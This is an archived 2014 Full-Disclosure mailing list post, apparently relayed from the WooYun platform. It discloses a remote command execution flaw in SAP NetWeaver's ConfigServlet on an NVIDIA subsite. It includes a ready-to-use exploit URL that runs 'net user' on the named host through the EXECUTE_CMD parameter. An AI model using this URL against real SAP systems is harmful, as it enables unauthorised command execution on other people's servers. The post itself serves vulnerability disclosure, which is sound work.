[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] [Wooyun] NVIDIA a SAP NETWEAVER remote command execution

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] [Wooyun] NVIDIA a SAP NETWEAVER remote command execution
From: "En.wooyun.org" <help.en@xxxxxxxxxx>
Date: Wed, 8 Jan 2014 00:25:48 +0800

*Abstract:*
NVIDIA a subsite SAP NETWEAVER remote command execution.

*Details:*
url：
https://nvcare.nvidia.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net%20user

*Proofs of concept:*

*[image: 内嵌图片 1]*

*Form:*
http://en.wooyun.org/bugs/wooyun-2013-041
-- 

WooYun, an Open and Free Vulnerability Reporting Platform

For more information, please visit *http://en.wooyun.org/about.php
<http://en.wooyun.org/about.php?>*

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [CVE-2014-1203] Eyou Mail System Remote Code Execution
Next by Date: [Full-disclosure] [Wooyun] OVH a subsite Zabbix Sql injection
Previous by thread: [Full-disclosure] [CVE-2014-1203] Eyou Mail System Remote Code Execution
Next by thread: [Full-disclosure] [Wooyun] OVH a subsite Zabbix Sql injection
Index(es):
- Date
- Thread